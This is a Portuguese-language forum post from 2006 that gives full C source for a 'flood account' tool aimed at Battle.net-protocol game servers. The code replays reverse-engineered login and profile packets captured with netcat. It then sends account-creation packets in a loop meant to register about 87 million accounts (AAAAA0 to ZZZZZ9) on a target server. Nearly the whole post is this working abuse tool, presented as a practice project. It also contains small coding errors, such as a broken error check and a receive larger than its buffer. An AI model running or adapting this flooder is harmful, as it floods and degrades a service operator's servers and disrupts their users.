Battle.net - Flood Account

Started by Dark_Side, 03 de December , 2006, 09:29:40 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

Print
Go Down Pages1
User actions

Dark_Side

03 de December , 2006, 09:29:40 PM
Hi,

Neste meu último mês, voltei a brincar com esses jogos online. Em um jogo que utiliza o protocolo BATTLE.NET (exemplos: warcraft, broodwar, etc), fiquei curioso para saber como funcionava o processo de login e criação de novas contas. Procurando pela documentação do protocolo, não encontrei nada que realmente pudesse me guiar, então, resolvi entender o protocolo na "unha" através de sockets e com a ajuda do NETCAT.

Consegui ver os dados que eram trocados entre o servidor e o cliente e resolvi fazer um pequeno programa pra treinar =)

Trate-se de um Flood Account - um programa que cria diversas contas no servidor....

Segue o código em C:

Code Select
// By Dark Side
#include <stdio.h>
#include <winsock.h>

#define HOST_IP  "xxx.xxx.xxx.xxx" // IP do servidor

WSADATA wsadata;
SOCKET sock;
struct sockaddr_in addr;

int a,b,c,d,e,n;


int main()
{


puts("Inicializando...");

// Incializa winsock
if(WSAStartup(0x101,&wsadata) == -1)
    {
      puts("Erro na inicializacao.");
      return 1;
      }


puts("Criando socket...");

// Cria socket
sock = socket(AF_INET,SOCK_STREAM,0);

if(sock == -1)
{
      puts("Ocorreu um erro ao criar socket");
      return 1;
      }

// Inicializa comunicação com o servidor
char acc[] = "\x1\xff\x50\x33\x0\x0\x0\x0\x0\x36\x38\x58\x49\x50\x58\x45\x53\xcd\x0\x0\x0"
             "\x53\x55\x6e\x65\x7f\x0\x0\x1\xb4\x0\x0\x0\x16\x4\x0\x0\x16\x4\x0\x0\x42"
             "\x52\x41\x0\x42\x72\x61\x7a\x69\x6c\x0";

// Solicita processo de login
char login_code[] = "\xff\x25\x8\x0\xa3\xfa\x19\x6\xff\x51\x75\x0\xa5\xd5\x2e\x46\xb\x3"
                    "\x1\x1\x6d\x1d\xed\x8f\x1\x0\x0\x0\x0\x0\x0\x0\xd\x0\x0\x0\xc\x0\x0"
                    "\x0\xa6\x44\x0\x0\x0\x0\x0\x0\x86\x1\x6\xa8\x90\xb2\x35\xeb\xfd\x9f"
                    "\x84\x4b\xdf\x61\x43\xe4\xfe\x3\xee\xc6\x73\x74\x61\x72\x63\x72\x61"
                    "\x66\x74\x2e\x65\x78\x65\x20\x30\x31\x2f\x31\x33\x2f\x30\x36\x20\x30"
                    "\x35\x3a\x34\x32\x3a\x34\x38\x20\x31\x31\x34\x36\x39\x33\x39\x0\x57"
                    "\x61\x6c\x6c\x61\x63\x65\x20\x46\x65\x72\x72\x65\x69\x72\x61\x0";

                   
                    // Envia um profile falso
char profile[] = "\xff\x2d\x4\x0\xff\x33\x1b\x0\x1d\x0\x0\x0\x0\x0\x0\x0\x69\x63"
"\x6f\x6e\x73\x5f\x53\x54\x41\x52\x2e\x62\x6e\x69\x0\xff\x33\x18\x0\x1a\x0\x0\x0"
"\x0\x0\x0\x0\x74\x6f\x73\x5f\x55\x53\x41\x2e\x74\x78\x74\x0\xff\x33\x19\x0\x1b\x0"
"\x0\x0\x0\x0\x0\x0\x62\x6e\x73\x65\x72\x76\x65\x72\x2e\x69\x6e\x69\x0\xff\x26\x9d"
"\x1\x1\x0\x0\x0\x13\x0\x0\x0\xda\x81\xbd\x0\x6f\x57\x0\x70\x72\x6f\x66\x69\x6c\x65"
"\x5c\x73\x65\x78\x0\x70\x72\x6f\x66\x69\x6c\x65\x5c\x61\x67\x65\x0\x70\x72\x6f\x66"
"\x69\x6c\x65\x5c\x6c\x6f\x63\x61\x74\x69\x6f\x6e\x0\x70\x72\x6f\x66\x69\x6c\x65\x5c"
"\x64\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x0\x52\x65\x63\x6f\x72\x64\x5c\x53\x45"
"\x58\x50\x5c\x30\x5c\x77\x69\x6e\x73\x0\x52\x65\x63\x6f\x72\x64\x5c\x53\x45\x58\x50"
"\x5c\x30\x5c\x6c\x6f\x73\x73\x65\x73\x0\x52\x65\x63\x6f\x72\x64\x5c\x53\x45\x58\x50"
"\x5c\x30\x5c\x64\x69\x73\x63\x6f\x6e\x6e\x65\x63\x74\x73\x0\x52\x65\x63\x6f\x72\x64"
"\x5c\x53\x45\x58\x50\x5c\x30\x5c\x6c\x61\x73\x74\x20\x67\x61\x6d\x65\x0\x52\x65\x63"
"\x6f\x72\x64\x5c\x53\x45\x58\x50\x5c\x30\x5c\x6c\x61\x73\x74\x20\x67\x61\x6d\x65\x20"
"\x72\x65\x73\x75\x6c\x74\x0\x52\x65\x63\x6f\x72\x64\x5c\x53\x45\x58\x50\x5c\x31\x5c"
"\x77\x69\x6e\x73\x0\x52\x65\x63\x6f\x72\x64\x5c\x53\x45\x58\x50\x5c\x31\x5c\x6c\x6f"
"\x73\x73\x65\x73\x0\x52\x65\x63\x6f\x72\x64\x5c\x53\x45\x58\x50\x5c\x31\x5c\x64\x69"
"\x73\x63\x6f\x6e\x6e\x65\x63\x74\x73\x0\x52\x65\x63\x6f\x72\x64\x5c\x53\x45\x58\x50"
"\x5c\x31\x5c\x72\x61\x74\x69\x6e\x67\x0\x52\x65\x63\x6f\x72\x64\x5c\x53\x45\x58\x50"
"\x5c\x31\x5c\x68\x69\x67\x68\x20\x72\x61\x74\x69\x6e\x67\x0\x44\x79\x6e\x4b\x65\x79"
"\x5c\x53\x45\x58\x50\x5c\x31\x5c\x72\x61\x6e\x6b\x0\x52\x65\x63\x6f\x72\x64\x5c\x53"
"\x45\x58\x50\x5c\x31\x5c\x68\x69\x67\x68\x20\x72\x61\x6e\x6b\x0\x52\x65\x63\x6f\x72"
"\x64\x5c\x53\x45\x58\x50\x5c\x31\x5c\x6c\x61\x73\x74\x20\x67\x61\x6d\x65\x0\x52\x65"
"\x63\x6f\x72\x64\x5c\x53\x45\x58\x50\x5c\x31\x5c\x6c\x61\x73\x74\x20\x67\x61\x6d\x65"
"\x20\x72\x65\x73\x75\x6c\x74\x0\x0";

// Para criar as contas... São 6 bytes destinados à conta: 58 a 63.
char conta[] = "\xff\x3d\x1e\x0\x93\x24\x44\xfe\x78\x0\xc2\x6d\x51\x95\x33\xa0\x3\x23\xf8\x59"
"\x13\x3f\x51\x6e\x44\x44\x44\x44\x44\x0\xff\x0\x4\x0\xff\x3d\x1f\x0\x84\x10\x4d\x8a\xaf\x3d"
"\x64\x91\x2c\x7e\xa8\x84\xd4\x36\x18\x27\xf8\x66\x56\x1e\x41\x41\x41\x41\x41\x30\x0";

// Configura socket
addr.sin_family=AF_INET;
addr.sin_port = htons(6112);
addr.sin_addr.s_addr = inet_addr(HOST_IP);

puts("Conectando-se...");

// Conecta-se
if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==-1)
{
                        puts("Erro ao se conectar...");
                        return 1;
                        }
                       
puts("Enviando dados...");

// Envia dados iniciais
send(sock,acc,52,0);
char resp[100];

// Recebe resposta
int i = recv(sock,resp,100,0);
if(i < 0) // Verifica validade
{
      puts("Ocorreu um erro ao enviar dados");
      return 1; // Encerra
      }

// Envia segundo bloco
send(sock,login_code,125,0);
memset(resp,0x0,100);
i = recv(sock,resp,100,0);

if(!i < 0)
{
      puts("Ocorreu um erro ao enviar dados");
      return 1;
      }


send(sock,profile,493,0); // Envia terceiro bloco

memset(resp,0x0,100);
i = recv(sock,resp,5000,0);
if(i < 0)
{
      puts("Ocorreu um erro ao enviar dados");
      return 1;
      }



// Começa a criar as contas
puts("Floodandando...");

// AAAAA0
// AAAAA1
// AAAAA3
//..
// ZZZZZ9

// Cria cerca de 87.890.625 contas  =)
for(a=65;a<=90;a++)
 for(b=65;b<=90;b++)
  for(c=65;c<=90;c++)
   for(d=65;d<=90;d++)
    for(e=65;e<=90;e++)
     for(n=48;n<=57;n++)
        {
            conta[58] = (char)a;
            conta[59] = (char)b;
            conta[60] = (char)c;
            conta[61] = (char)d;
            conta[62] = (char)e;
            conta[63] = (char)n;
           
             
send(sock,conta,65,0);  // Envia último bloco com os 6 bytes destinados às contas alterados

memset(resp,0x0,100);
i = recv(sock,resp,100,0);

}
 
  // Finaliza socket, winsock e encerra.
closesocket(sock);
WSACleanup();
return 0;
      }

Sei que não é algo tão interessante, mas é bom para incrementar o conhecimento =)

Bye.
Print
Go Up Pages1
User actions